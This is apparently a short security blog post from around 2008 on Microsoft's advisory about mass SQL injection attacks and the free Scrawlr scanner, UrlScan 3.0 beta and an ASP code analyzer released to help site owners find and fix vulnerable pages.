Not sure it's unprecedented, but it's certainly very rare. Microsoft has released a security advisory regarding the ongoing SQL injection attacks that have compromised millions of Web pages over the past six months. As part of the initiative, Microsoft also approached HP to create a scanning tool to assist Web developers in checking their own sites for susceptibility to the attacks. The result is Scrawlr, a free tool that mimics the methods used by one of the attack tools behind many of the SQL injection attacks. (That attack tool is discussed in detail in this SANS Diary entry).  Essentially, Scrawlr crawls and indexes the site as a search spider would (the attackers are using search engines to discover susceptible sites). Scawlr then attempts to enumerate all the tables matching specific criteria and render the exploit using the same methods employed by the automated SQL injection attack tool. Scrawlr then extracts all the user tables (verbose) to confirm the success of the attack and to minimize any false positives before flagging the results. Scrawlr isn't intended as a replacement for tools such as Absinthe, Burp, or Power Injector - its sole purpose is to provide Web developers with a free, easy way to check their sites for susceptibility to the specific SQL injection attacks resulting from this specific attack tool.

For their part, Microsoft has released UrlScan v3.0 (beta) that restricts the type of queries Microsoft IIS will process. Additionally, Microsoft has released a source code analyzer to find SQL injection vulnerabilities in ASP code. Used in conjunction with Scrawler, these free tools should go a long ways towards assisting even novice Web site owners in discovering and remediating SQL injection susceptibilities. Hopefully the end result will be far fewer compromised websites and a corresponding decrease in the number of password stealers and backdoors being foisted onto users' systems when they browse the Web. In May 2008, the rate of Web-based exposure to password stealers and backdoors had increased 855% compared to May 2007 - largely a result of these ongoing SQL injection attacks.